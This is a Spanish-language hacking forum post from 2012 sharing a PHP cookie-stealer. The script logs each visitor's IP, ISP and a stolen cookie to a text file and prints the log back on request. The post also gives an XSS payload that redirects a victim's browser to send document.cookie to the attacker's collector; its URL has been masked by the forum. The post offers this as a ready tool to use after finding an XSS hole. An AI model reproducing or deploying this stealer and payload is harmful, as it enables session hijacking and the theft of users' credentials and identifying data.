Robo de Cookies & IP & ISP

Iniciado por Matabarras, Julio 07, 2012, 06:16:51 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 07, 2012, 06:16:51 AM Ultima modificación: Marzo 27, 2014, 05:47:19 PM por Expermicid
Código: php
<?php

if(isset($_GET["leer"])) {

$read = file_get_contents("cookie.txt");
echo $read;

} else {
$cookie = $_GET["cookie"];
$texto = "Ip: ".$_SERVER["REMOTE_ADDR"] . " - ISP : ".gethostbyaddr($_SERVER["REMOTE_ADDR"])." - Fecha: ".date("H:i:s d/m/Y")." - Cookie: ".$cookie."<br>";
$l = file_get_contents("cookie.txt");
file_put_contents("cookie.txt",$texto.$l);
}
?>



Esto es util cuando cogemos una xss, y la explotamos por ejemplo:
<script>location.href=\'No tienes permitido ver los links. Registrarse o Entrar a mi cuenta .cookie;</script>
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario